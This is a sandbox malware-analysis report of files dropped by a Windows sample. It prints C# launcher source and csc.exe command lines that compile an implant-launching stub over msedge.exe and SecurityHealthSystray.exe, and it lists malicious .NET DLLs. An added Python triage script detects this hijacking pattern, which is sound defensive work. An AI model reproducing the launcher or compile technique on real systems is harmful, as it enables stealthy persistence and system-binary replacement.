                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                  Category:dropped
                                                  Size (bytes):395
                                                  Entropy (8bit):4.997424153875793
                                                  Encrypted:false
                                                  SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLa7vzaiFkD:JNVQIbSfhWLzIiFkMSfhmrnFkD
                                                  MD5:A909726567E5EFDAEEA07ADE29032606
                                                  SHA1:210F269C55F23EF3EA836E67865A51AEA6DFEB56
                                                  SHA-256:9BB93D40229031668A75B15A156CCCE4C8635E957291AE6A497D0ECDF9FC5CCD
                                                  SHA-512:D1D26057B4114B6ECF67338487CAC89B2FA914A5E44BF34C022B23CFE770869E76D5918CA0ADEA87E11D5D18A14FFA6B4642EE9F90FB5F55663905086A31EEFF
                                                  Malicious:false
                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\msportComWin\jnowHpJlZlXal.exe"); } catch { } }).Start();. }.}.
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):269
                                                  Entropy (8bit):5.11292063872954
                                                  Encrypted:false
                                                  SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23f5SWnn:Hu7L//TRRzscQlZh/n
                                                  MD5:032E53957AD0F21B227BFDB49F4D138C
                                                  SHA1:650DBF49D0663C78AD28D18F48E23E56C84FBF8B
                                                  SHA-256:73D94E5C67A20D3971D62A6DF7D87DB57E292423E37B0BCE1BCAA3600812562B
                                                  SHA-512:7FBADEC2029F09AB1E29A81A2992F4DA359E25D5A8B6538D2F8F6F45C864DC6ED2D4D3E11D2E8491000F8BB66FFEC48FF84DFD0F7C5DC5A93C1F33BD7287E51B
                                                  Malicious:true
                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.0.cs"
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (341), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):762
                                                  Entropy (8bit):5.235106981236256
                                                  Encrypted:false
                                                  SSDEEP:12:y6FoMI/u7L//TRRzscQlZh/uKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:y6FoMI/un/VRzstDsKax5DqBVKVrdFAw
                                                  MD5:22D2B08810760A9BB4C9D40F03C748D7
                                                  SHA1:0BF7F5750BC93EC41A6EDEEBCAE1F0D27F29D28B
                                                  SHA-256:FF9C06554C3551DEF40B45726C154C287A7CF3EEEBCE7A1D71B0BF2C52BC2E49
                                                  SHA-512:500B4B1F6CEC1252ED4365EF7E8910F710805D71C7526E83BD8AA9CA5F65699E1811905523931330A908A1F750E47A693189B245C94AF933993319F7C302CC8D
                                                  Malicious:false
                                                  Preview:.C:\msportComWin> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                  Category:dropped
                                                  Size (bytes):380
                                                  Entropy (8bit):4.953642471548714
                                                  Encrypted:false
                                                  SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2/pVv+saiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLaS
                                                  MD5:77DA26CDDBA7CD7B670047936A6DC5E1
                                                  SHA1:4B7EFE59E50DDFF8792D271ABE9488C49C25D087
                                                  SHA-256:3536797F0258EB4CC210C28CB6DE3CF20E390CF8017511625372DD865D3F0DCA
                                                  SHA-512:305AFD05E4FEF1B10DA64954CEFCBD587B1587777F84D610AB23E3A8B5AEFA2C279D7898B0767CD14B97E9B1B7B313D190B2BC5194999BA6C51A1C4AA481B3C1
                                                  Malicious:false
                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\msportComWin\jnowHpJlZlXal.exe"); } catch { } }).Start();. }.}.
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):254
                                                  Entropy (8bit):5.096091034292349
                                                  Encrypted:false
                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23f4VQn:Hu7L//TRq79cQlZwVQ
                                                  MD5:A53B01307FFD624AA239206F9C580CE5
                                                  SHA1:BBFB0D2F9AAEB95E69966602EF130DD750DDEC76
                                                  SHA-256:80A4684EB246E9DA933A426E072CD3602653B018D029575956F5163FB9276C62
                                                  SHA-512:4D255DB70A42D787996282C1B6567ACCDD1B11BC0B3A46F0D51CEF91456BEBB4DA301118BC3075828E1C8D85B75429D8B8509B4ED7F00B167A0676E2AA95CCAA
                                                  Malicious:false
                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.0.cs"
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (326), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):747
                                                  Entropy (8bit):5.247363193671764
                                                  Encrypted:false
                                                  SSDEEP:12:y6FoMI/u7L//TRq79cQlZwVFKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:y6FoMI/un/Vq79tDwvKax5DqBVKVrdFf
                                                  MD5:6A5B17506E184A34CD520B6C043839CF
                                                  SHA1:3D9CFD610F00E9AFAEC1F09519EAC121C1366158
                                                  SHA-256:24D7C4975C1C47DAE24996702B849BBA9DF902913E2B48E3930BE73DDB5FBD5F
                                                  SHA-512:51C2F05EF95DBCCBA458EB3CE4B98A0272C70DF839290E34E9DCF2E3B7DF7D9342A668F346F667614B627CD8417C9ECBD0FE3A790E7A95C55508D61E60E83788
                                                  Malicious:false
                                                  Preview:.C:\msportComWin> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
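The two csc.exe compiles recorded above show the pattern behind the "Dot net compiler compiles file from suspicious location", "Files With System Process Name In Unsuspected Locations" and "Infects executable files" signatures: a source file staged in %TEMP% is compiled straight into a protected directory under a system binary's name, and the resulting launcher forwards to the displaced original at "<name>.exe.exe" while also starting the implant. The following is an added triage example, not part of the Joe Sandbox report and not code from the sample; it re-parses the two command lines and the first launcher source exactly as they appear on this page (with the preview's "." line terminators written back as newlines), adds one constructed benign compile for contrast, and uses a constructed starter list of system binary names. Function and variable names are the example's own.

```python
import ntpath
import re

# The two csc.exe command lines copied from the compiles recorded on this page.
REPORT_CMDLINES = [
    r'/t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.0.cs"',
    r'/t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.0.cs"',
]

# Constructed benign compile (not from the report), for contrast.
BENIGN_CMDLINE = r'/t:library /out:"C:\Users\user\source\repos\App\bin\App.dll" "C:\Users\user\source\repos\App\Program.cs"'

# Launcher source from the report's first dropped .cs file, preview "." terminators restored.
REPORT_SOURCE = r'''using System.Diagnostics;
using System.Threading;

class Program
{
    static void Main(string[] args)
    {
        new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();
        new Thread(() => { try { Process.Start(@"C:\msportComWin\jnowHpJlZlXal.exe"); } catch { } }).Start();
    }
}
'''

# Tokenizer that keeps /out:"C:\Program Files ..." together as one argument.
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')
PROCESS_START_RE = re.compile(r'Process\.Start\(@"([^"]+)"')
PROTECTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")
# Constructed starter list; in practice seed it from an inventory of the gold image.
SYSTEM_BINARY_NAMES = {"msedge.exe", "securityhealthsystray.exe", "explorer.exe", "svchost.exe"}


def parse_csc(cmdline):
    """Split a csc.exe command line into (out_path, [source files], {flags})."""
    out, sources, flags = None, [], set()
    for raw in TOKEN_RE.findall(cmdline):
        tok = raw.replace('"', "")
        if tok.lower().startswith("/out:"):
            out = tok[len("/out:"):]
        elif tok.startswith("/"):
            flags.add(tok.lower())
        else:
            sources.append(tok)
    return out, sources, flags


def compile_findings(cmdline):
    """Findings about where the compiler reads from and writes to."""
    out, sources, flags = parse_csc(cmdline)
    findings = []
    if out is not None:
        low = out.lower()
        if low.startswith(PROTECTED_PREFIXES):
            findings.append("output written under a protected directory")
        if ntpath.basename(low) in SYSTEM_BINARY_NAMES:
            findings.append("output named after a system binary")
    if any(w in s.lower() for s in sources for w in USER_WRITABLE):
        findings.append("source read from a user-writable staging directory")
    if "/target:winexe" in flags:
        findings.append("built as a windowless exe, so the launcher shows no console")
    return out, findings


def launcher_findings(out_path, source):
    """Compare the launcher's Process.Start targets with its own output path."""
    findings = []
    for target in PROCESS_START_RE.findall(source):
        t = target.lower()
        if t == out_path.lower() + ".exe":
            findings.append("forwards to the displaced original at " + target)
        elif not t.startswith(PROTECTED_PREFIXES):
            findings.append("also starts " + target + " outside system directories")
    return findings


def triage(cmdline, source=None):
    """Verdict for one compile; two or more findings is treated as suspicious."""
    out, findings = compile_findings(cmdline)
    if source is not None and out is not None:
        findings += launcher_findings(out, source)
    return {"out": out, "findings": findings, "suspicious": len(findings) >= 2}


if __name__ == "__main__":
    for cl in REPORT_CMDLINES + [BENIGN_CMDLINE]:
        r = triage(cl, REPORT_SOURCE if "msedge" in cl else None)
        print(r["out"], "SUSPICIOUS" if r["suspicious"] else "ok")
        for f in r["findings"]:
            print("  -", f)
```

Feed the same function the csc.exe command line from a Sysmon event 1 or 4688 record and, where the dropped .cs is recoverable, its contents; on a real host, also check whether "<out_path>.exe" exists, since that renamed copy is the displaced original and the only evidence that the protected binary was swapped rather than merely overwritten.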
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):5.645950918301459
                                                  Encrypted:false
                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
